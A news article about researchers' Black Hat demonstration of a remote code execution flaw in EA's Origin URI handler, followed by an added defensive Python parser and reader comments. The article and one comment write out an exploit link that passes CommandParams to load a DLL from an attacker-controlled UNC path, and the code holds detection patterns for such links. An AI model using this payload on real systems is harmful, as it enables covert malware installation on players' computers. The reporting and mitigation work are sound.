Millions could be at risk of exploits that use Origin to execute malicious code.

More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game platform allowing attackers to remotely execute malicious code on players' computers.

The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

Update: "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure," an EA spokesman wrote in an e-mail to Ars.

The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, games, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.

The Origin attack works much the same. It exploits the functionality that allows sites to start games remotely. By modifying the variables in the underlying URI links, the commands to start a game can be replaced with instructions that cause a computer to install a malicious program instead. One such command, which was included in the demo, is related to the OpenAutomate standard used in software provided with graphics cards from Nvidia. The technique works against people who have installed Crysis 3 and a variety of other games. Other techniques work against machines with different titles installed.

When an origin:// link is opened for the first time, browsers will typically ask whether the user wants it opened in the Origin client, which is the registered application for such URLs. Different browsers handle these links differently: some display the full path, others show only part of it, and still others do not display the URL at all. Some confirmation prompts offer to use the Origin client for all origin:// links encountered in the future, and many gamers choose this setting so they aren't prompted again. Users who have selected it may be attacked without any interaction at all. Users who want to protect themselves should make sure they are prompted before Origin links are processed.
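The handler-side fix the article implies, as an added example that is not EA's or ReVuln's code: a launch-URI parser that accepts only a numeric game id on origin://LaunchGame links and refuses every query parameter, so nothing from the link reaches the game's command line, with the same checks exposed as indicators a proxy or log scanner can flag. The numeric id format and the action name are assumptions drawn from the origin://LaunchGame/71503 link quoted above.

```python
# Added example, not EA's or ReVuln's code: a strict origin:// launch-URI parser
# that forwards nothing from the link to the game, plus log/proxy indicators.
import re
from urllib.parse import parse_qs, urlsplit

GAME_ID_RE = re.compile(r"^/(\d{1,10})$")    # hypothetical id format
UNC_PATH_RE = re.compile(r"\\\\[^\\\s]+\\")   # \\host\share (remote DLL/EXE)


class UnsafeLaunchURI(ValueError):
    """The URI carries more than a bare numeric game id."""


def parse_launch_uri(uri: str) -> int:
    """Return the game id from origin://LaunchGame/<id>; refuse anything else."""
    parts = urlsplit(uri.strip())
    if parts.scheme.lower() != "origin":
        raise UnsafeLaunchURI(f"unexpected scheme {parts.scheme!r}")
    if parts.netloc != "LaunchGame":
        raise UnsafeLaunchURI(f"unsupported action {parts.netloc!r}")
    m = GAME_ID_RE.match(parts.path)
    if not m:
        raise UnsafeLaunchURI(f"game id is not numeric: {parts.path!r}")
    if parts.query or parts.fragment:
        # Refusing every parameter removes the CommandParams pass-through.
        raise UnsafeLaunchURI("parameters are not accepted on launch links")
    return int(m.group(1))


def is_safe_launch_uri(uri: str) -> bool:
    """Accept/reject wrapper for callers that do not need the id."""
    try:
        parse_launch_uri(uri)
    except UnsafeLaunchURI:
        return False
    return True


def risk_indicators(uri: str) -> list[str]:
    """Indicators worth flagging when a launch URI shows up in logs or a proxy."""
    params = parse_qs(urlsplit(uri.strip()).query, keep_blank_values=True)
    found = []
    if "CommandParams" in params:
        found.append("command-line pass-through (CommandParams)")
    for value in (v for values in params.values() for v in values):
        if UNC_PATH_RE.search(value):
            found.append("UNC path in parameter (remote DLL/EXE load)")
        if any(tok.startswith("-") for tok in value.split()):
            found.append("switch-style token in parameter")
    return found
```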

Promoted Comments

This isn't what I would consider an esoteric security vulnerability, so much as a basic issue with URI handlers. It makes whatever application essentially a browser plugin, because once you click the "handle all future links" option (or whatever it is in your browser of choice), you have then opened up a "trusted" path between the internet and the handler in question. Having seen it with Steam, as was mentioned in the article, and also now Origin, I have a feeling that there are plenty more handlers out there with significant issues that are simply more niche than Origin or Steam.

I'm not trying to excuse it or say it doesn't matter, just that one should always be careful when choosing to treat all future links in the same way, regardless of the handler. It's annoying, but if you set it so that you have to approve the link every time, it means you will notice when something does it unexpectedly, and might not click "yes".

Origin also needs to clean up their handling to not allow arbitrary downloads and execution, but I suspect that there will always be some risk, especially if parameters can be passed to the game being executed (which makes every game on Origin/Steam/whatever an indirect risk).

I thought DRM didn't affect honest, paying customers. I'm shocked that forcing people to install DRM software in order to play games increases the surface area for attacks and degrades the user experience.

This has nothing to do with DRM. This has to do with Origin. If Origin was just an app that let you download and manage your library of DRM-free games, this bug would still be present.

Security issues with URI handlers are literally commonplace.

If it were just an app you download to manage your games, you could play the games without downloading this app, or at least uninstall it when the vulnerability is announced, to protect yourself. But because it's DRM, you're stuck with it. Thus, DRM increases the surface area for attacks and degrades the user experience more than an independent app.

You could just as easily prevent your computer from doing anything with origin:// links. Once you know it's a problem, it's pretty easy to avoid, which is true of every application that can execute something.

Also, from the article, "it requires no interaction by victims" - doesn't it require them to at least click a link? While seemingly minor, there's a massive difference between an exploit that can be exploited without any interaction by the victims (I'd be running home to uninstall Origin right now) and one that at least involves them to stumble across a URI and click on it.

edit: Plus "the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.", that doesn't seem terribly risky to me, I don't have evil.dll on my computer already. Or is there a way to get evil.dll there? edit2: Whoops, somehow missed the "Attacker IP" part in the article on my first read through

It's really pretty funny that I would put more trust in skidrow cracked games than anything that the publishers release. And even more funny that they often have releases out before the actual game.

Every time I buy an Ubi game I kick myself again for not pirating it. Bought Assassin's Creed 3 on sale last night and after fighting with Uplay and eventually having to uninstall it and reboot my system, and then reinstall it again to even get the game to launch, I asked myself "Wait a minute, didn't I learn this last time with Far Cry 3?? Why didn't I just pirate this."

It's unreasonable to expect most people to analyze every bit of software for vulnerabilities like this and take the necessary measures to prevent them. The software should be secure in its and the OS's default state.

An attacker could use the HTTP `Location` header to instruct the browser to have the system launch just any URI. This means that depending on the browser, a booby-trapped image, frame or link could be enough.

In the article, it referenced the attacker's IP, as in "\\6.6.6.6\evil.dll"

You said

Quote:

you could play the games without downloading this app, or at least uninstall it when the vulnerability is announced

I was responding to that. There are plenty of DRM free game downloaders, like GOG's, that would be open to the same kind of attack. The user would have to know about the vulnerability and uninstall it to protect themselves.

Alex777 wrote:

In the article, it referenced the attacker's IP, as in "\\6.6.6.6\evil.dll"

Thanks, I somehow completely missed that reading through it and thought "on the users computer" meant a file already there

This attack could easily be paired with something like an XSS exploit to bypass the need for a user click. I agree that this isn't a particularly serious vulnerability, given that it can be mitigated pretty easily as you mention.

However, I think you're missing Solomonoff's point: Origin is DRM and users that want to play their games are *forced* to deal with its associated URI handling issues. There is no way for someone to opt out of the system, regardless of the security concerns that it presents, without losing access to software that they paid for. Users of the GOG manager, for instance, are not hampered by that requirement and could bail if they felt the system were flawed.